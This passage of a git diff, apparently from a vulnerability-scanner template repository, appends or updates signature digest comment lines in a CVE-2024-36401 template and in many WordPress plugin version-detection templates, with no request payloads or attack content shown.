a/http/cves/2024/CVE-2024-36401.yaml +++ b/http/cves/2024/CVE-2024-36401.yaml @@ -65,4 +65,4 @@ http: part: content_type words: - "application/xml" -# digest: 4a0a004730450220279aaebd1a369cf4592114ead904a1520e41ad97306683da9c89b53d278a40a3022100d045a6c3237dcc38c0af5dce4e225c736ea8361f759fb8fc444da9a24ab3c6ed:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220735fae2d600334ad0b407f6e2a0905a071226561197d52236f48b8065ee38fa4022100c16a9085e40790dda9b6217e62a1d5fc3d0d68d7443cf10582b55cece0c2e632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..52a70bcd1f 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c65b823d5ea99f97e8d18e798271d51bca4942510f098776ddcff1095fe1c23202203df76afb09f08b71d8337f4275bfbb3f707f23239683fd09af198548fd30b49e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..414b8e1f46 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200da6585c66bc8846cd2f9ca26a91e682f5dcb45c5fd8b5d6482453765287a4fe022053773056083cc5deb2811182955c6db3db546c6a7013fa32395942582b868aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..3f9dd9c9f9 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b40b3c8bc7f6e73664404bece294910391a69ea90c9bda651d4ea4b1a6d44679022037b7ac6f050c4a6c7140b2b8e523a264db8d0bd46d6fbd269f5b525165c95862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..e0efdbf049 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b8e9474a66e9f53bb5f6511bbd2e0687db461ef22605c04c117b363823b97960221009b10b16219fe1ddca3d95535c1c5188f83491bbcfae9f61366c609dc6e09e4a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..685bc73229 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c283c006f56d4531a17d038ece215b7bcbba1e802da341fe156482f5aed4cc3022009aea70e7c847f937da37422e056b8f6d2d977dc93fa1cf598d4d00badde65c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..96ae6393d1 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210088ff73665cfd4c14c4bc8a41145346ba08df6fe5ca5132668978c8369536dbc0022100ef8f41ff0b297cd5eab55929696199dd414507a1863fa0509dd350c70b227cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..23f5c0a784 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b65a492084c14ce7cb4558863c31965501d1f983924886b44df1e5c532aca090221009583ec10a3571aa6968cc28eb63206e0f29aa9f1ca2696c4af461ef67ae195c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..bce4c6c75a 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079ad81fd618dd66f86b18703cb2c9d6e660cea83aa210bd6405b5dee2af11df502202a3e08b399df2ab88c31014dc9eb114415f8783b9cc8a6d71d6e313bec5d0029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..2956599a36 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f08486185fa1c664d9c3bd526c6a1134f25c0c690f7416d1d5f933ca9f9bedc02203469935a9fe2e20b0ccd414464ae42c606c0d0469c1000ae477b8ba37b50be39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..e11435ddc2 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b62a173a79e9c39c665cbbfaa1c9cc5ce7203586bb9a7c74035eed740c4f420702206baafb39b911c2922bb1dfeb064e58a920973ead81221561619aab3f616238d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..74d22f67e3 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079c392a31478d84f9b4bee3f964e4df5be78e88145c0178fe8dcc02ca2acebd0022039f528e9fc1e2dff2f32cc3e6249762429d5a84170628c3c21f7df335d989061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..7dd3eb88d5 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ea65f24e64f20f1c706cef003345c9d44ac00e78f227a2a6a580173dd9e52647022100b1f27362e14c160715da13cc0cd2f8e0fa34ac6ed539be12848d67682a7ecf96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..42ca1cca2d 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203719158333e1637929e373339820d1b8b03e40fec6d5eff273863b2cc35ce6a80220443148b554681622699f05609be51fab0b06d4cfacc095fbc80d6e5fa41ffd52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..29ac03b930 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ab24329151f03bdefc2ce80deb358f1305f08d8e999da427ecf3886b7e64153a02202d2f23e03e8c869d081097759bb4c69ef93e9ef5d1395c1a51305073b52c49eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..a9d979c0e5 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da4fe179b9b4c7089b548fc06bbc015ce003b9d4b46ea1944bdb53897049fd7f0220059d856a2a8b31a5011801bc2c97901cb26bd2544285d3e60b58691523c7291f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..192d4fd0a9 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc56b4d399e4a59e72e8553e014da111a93fc345649f0a2ef06a7ad1708a27ea022100d02d6c0466801c9c541bf03278bf00d29672447626f861c9a84d7e8e90545dd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..5fb7ea9a3c 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e3a4711b824a1e1081d96ae167a1d55cb5a4256c641d3e112bc8694c76fd033602203ace72fd244107d02b17231f8192a9bcc37a63f07060f877481938340db0ac70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..b277a430d3 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b841d61d2f86424b38c7a93e21c0038922a8c77ca63ca1f69bfb467c38765237022025341015f037bb29f036d00069a17e41dca06455f252d30cfc07785e77128a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..1177d38a77 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e735b105ed63ee23722e5a4f8d18dba49f00cd6c563ab73ef5db7df693f015902203d20d751a8d889ebc7a6c8b8b89bb850cb08d188dc967ce51a46270e3daf3f0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..c122d1f057 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b8ec4a1f105712de7a2d8e9b5b3fe65f8946a6000626770d302d2b6f468a739302201a29d8088e8f333cbba876560db7f9079af738c529481cda13cbd8af2ddfee54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..6d0df5aaab 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee90998c47458e2709b8acb4054512f9a82383bcf4dad743f01b9c3124c4c87c02201142a47b00bcc7df0321ae026493787a5390e19112fc30af34cdb0a60ff7095c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..a20ff68328 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf5a03127cd3cc9563db65b0781e56931696dbd833caf2daab173172da9dd38a022100b6e0b9f929e4582b9c53f27d322c4e66ea96b29a341477c73fe9d768f6073a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..3759654c32 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b30dbdb69a0d3309dcceb706292aaca1f79ffc026931097293b3d2eb1bcaa6800220094f253b5bd2d73c7c93e85f16e4b6af3da84569af061356eb0d20244b77d80c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..621761f13e 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220550a62b664c80bb3a191c3f914f48b43fe2fa627b04e9473ce32769bc93a9961022100e6763e3797911f7b483cd6e8489b5ff7eadcd76c5b4483807d24a3d4fe72b60f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..8ec465a529 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e19ad19c1de0e35bb88ba8b38a1d34ca17100fd5106f7892840703f277d23ed022100edb4b95a7f2c68a5b2aa1e2df6df4e8597a751e95164ce6bdef1ffe1194c972d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..9704d3bdc4 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201435b6d9c4d926f108b8e4dc4030902de7bf7fd638dc817a0dc753c64d47696e02204e9ecb194d9d1014528aedda893f0dabc9ac80ef5cfc1543a8785a017d951e94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..8fbf301aee 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aac647d87b1dc22564132f538ae91918caf8d676cda7f94e6bd748714ce5fbe1022053cf242e74c1841ff2c0a355b86b165edb02464e1b66f6e57142e13c76a95674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..b40772c800 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e94e954f8ab15265bc272850ce5e21531c75b363d7917b1907188f085d6b378902210080b43ed897ac918703098dbadbe5526aa6af3d48b9eda3895c3a6a12e08d26b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..803c525878 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204784fb5600ffd663ad2bff0bd813dc0740f08f5f69b1a04ae7bf3bcf23d18fe4022015371936d5cdc2f5629d00ac27398fbaeed3bd3b3b614a07b8520cb9b7ccdb89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..4cf1100abd 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220030b1605a2148bf426b45dda43711c1d41c948c0242cbd769f4d3d8a2434036102210095c2b2fdf8fd937bc89aafc185187fadbdb2bc6566c0bb6284b6ad55ecb999c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..038e6619da 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220649cc00b8752020c6ada49c61addff74a31d6d150cd86d66c090e89c1b6a816502206539c70f1f27639d3a93059b878eab9fb10d612e9fb3453f26c2ad52dcf64479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..1a1ae3c440 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb0914fd3e1eec1f734722906ae3b3c298b9da5abc08d98d1274fa9df4cf1e8802210080e5e8e03353803b0fcea7f986ba2caed1c3d2077fe2ad6aef85e0499d86bfeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..27f321fecf 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210085fa5c61a020f03505e0a518b6b1bc2f05354dcb9685a0cf806c67c8291177820220790943a11d295a4af764d96d09a4603e8bf02a87c8756be5fad9783c9b577c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..62bbb0b883 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a8a908894c2494a6322820e9ac1d07883a0019d3df3e11f685b5cb06beacaeaf022100ad0d5adfe0b6dfac60a257749031bda3a46d98941449418173814d4ac20fb064:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..e4b5536e84 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e077c85747996fcec2037f426938a40b82fbe10914df0184e5ca7e2736ef3f502207658548bfc080f39b2b770df08454856bb19c87591f0beb623aca9fdfd9ecb51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..065a95456e 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220724e7b4aee59c4ea617c59bc2fa442009cb1ef16527ac5e71fd224208092a280022061e345736f255b9a1cfd67087056155880e3648cd43f6bdeeb5185bcf930c764:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..6ffdcae524 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a48cd636d3048eab3157d063d4e35af4d1646a0c230f4f1cb040b1ca0943233022100f16243d95c799e0c8ebc6cbbcee5039316b1cddc152b060ff45bb5087f84fc52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..91c580f389 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f926ca83c02a199013f4eeea6a7ea7f75f0b2578ea2becba0f87e6b1cf27a1b022100bed67dbd2468de67325cbd23b57be9de2c8eb97e19d1d4a4b41d52193858c118:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..33b88b8b66 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204f8fa4f6528634198fc92c04b0fa411c50e3ebe0269959caa8fa91ef750b1e99022062476d32dc5337a1e1f20a2443141b44370adb686e8650cc57f5c5777e54f062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..e68a4ff4f9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ffd38d548b60af8903f22f5cd8b6145133673c51e51ea0ba0a60e8fde33898a022032b92b60ffa578397b3d449f5959847f7a80b475f3258e760b445e69d97e3b37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..ac6e4fa500 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f396796023ce2494b9212462490c32a4f05637c9e95b0d3f3784461a7a920cf4022012eea0f57c50533a7e25976c0bda1c2d58211766ed64478180c51fe7239b9d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..eaa6055705 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206647404eed2a17708f789c643a269d9a972e8c3806e9ccd2e3972415b903d6bb02210096e8ed55043e9d0fe709895b301485a48359c769663a3e391f9a4478304556bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..9079d50df2 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f7d4586849b93fd153002dc2a3022ff105ab0948d0fbd467ddf633d93a5d33a022064b62e813fe732b75527a4b8e5773fb71a98ff91ee883b050daa092e3896fb24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..e9dc6baad1 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022036cc66d181fb06ce72a320b042b7d550382a8cfa3efbb23700c6789f86f7237e0221009086fa6d73425624829c00e7a79119a09c14539aea7e0e9dbed0e952c647221a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..af1cbb5cf8 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000b14f288c81f9421b2c30b343f631d99c436c250edaf810f084224c1adee4cc0220352e66a35411c9883500585d77937335e9c844c6f0454e699c8429468703242e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..5c6d0b995c 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210091e2e8b922c8a2026e6602cad8b94edcdf612fed6afa4a2e6af0613c2909558302206e61b7d2203ba5b26d018001e0c8761a682b1949d58611cd0e2fa940c1866f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..2c9e58e1c5 